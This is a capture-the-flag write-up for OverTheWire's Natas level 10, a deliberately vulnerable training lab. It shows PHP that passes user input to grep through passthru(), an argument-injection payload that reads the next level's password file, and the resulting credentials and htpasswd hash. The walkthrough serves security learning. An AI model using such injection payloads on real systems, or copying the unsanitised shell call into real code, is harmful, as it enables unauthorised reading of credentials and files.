Natas Level 10

This is a solution guide to the Natas10 Level at overthewire. This write-up was created on 28 September 2015.

First connect to the website

• http://natas10.natas.labs.overthewire.org
• Enter the following as the username natas10 and password nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Let’s begin first by clicking on view source and examining the code for this level.

1
2
3
4
5
6
7
8
9
10
11
12
<?php
$key = "";
 
if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }}?>

This challenge is very similar to the last challenge except that it filters and checks for the following characters [;|&]. After the check it still uses the same php function called passthru(). If you want to learn more about passthru() check out this link. So now we have to find a way to send passthru() a command which will show us the flag inside /etc/natas_webpass/natas11.

This time we are going to send grep an actual valid command to search for our key. You can find more about grep here. Of note we know that we don’t have to worry about case due to the -i switch, and we also know that grep expects to have a pattern to search for followed by a named input file. So let’s try searching for all text with .* in the /etc/natas_webpass/natas11 directory. Now let’s place the crafted input into the search field:

.* /etc/natas_webpass/natas11 #

Which returns our password on the last line:

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$sDWfJg4Y$ewf9jvw0ChWUA3KARHisg.
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

The password is natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK